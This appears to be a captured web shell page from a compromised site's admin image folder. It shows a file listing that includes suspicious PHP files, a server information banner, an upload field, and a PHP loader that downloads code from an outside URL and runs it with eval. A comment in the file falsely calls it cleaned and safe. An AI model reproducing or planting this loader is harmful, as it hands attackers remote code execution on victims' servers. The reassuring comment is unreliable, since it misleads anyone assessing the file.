.. | |||||
120-SM775031.jpg | |||||
15-SM775019.jpg | |||||
220-SM864521.jpg | |||||
EDP_Flyer.png | |||||
closeup-long-bride-s-fingers-covered-with-mehndi-lying.jpg | |||||
download.jpg | |||||
images (1).jpg | |||||
lock360.php | |||||
maxresdefault.jpg | |||||
we.jpg | |||||
wee.jpg | |||||
weee.jpg | |||||
x.php |
Server IP : 50.63.8.133 / Your IP : 3.139.238.74 Web Server : Microsoft-IIS/10.0 System : Windows NT P3NWVPWEB032 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 User : IWPD_10999(xformtec) ( 0) PHP Version : 5.4.45 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : G:/PleskVhosts/xform.in/madhurivivah.com/admin/slider-images/ |
Upload File : |
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ $Url = "https://www.ommegaonline.org/fb/src/Facebook/HttpClients/certs/mini.txt"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $Url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); echo eval('?>'.$output); ?>
.. | |||||
120-SM775031.jpg | |||||
15-SM775019.jpg | |||||
220-SM864521.jpg | |||||
EDP_Flyer.png | |||||
closeup-long-bride-s-fingers-covered-with-mehndi-lying.jpg | |||||
download.jpg | |||||
images (1).jpg | |||||
lock360.php | |||||
maxresdefault.jpg | |||||
we.jpg | |||||
wee.jpg | |||||
weee.jpg | |||||
x.php |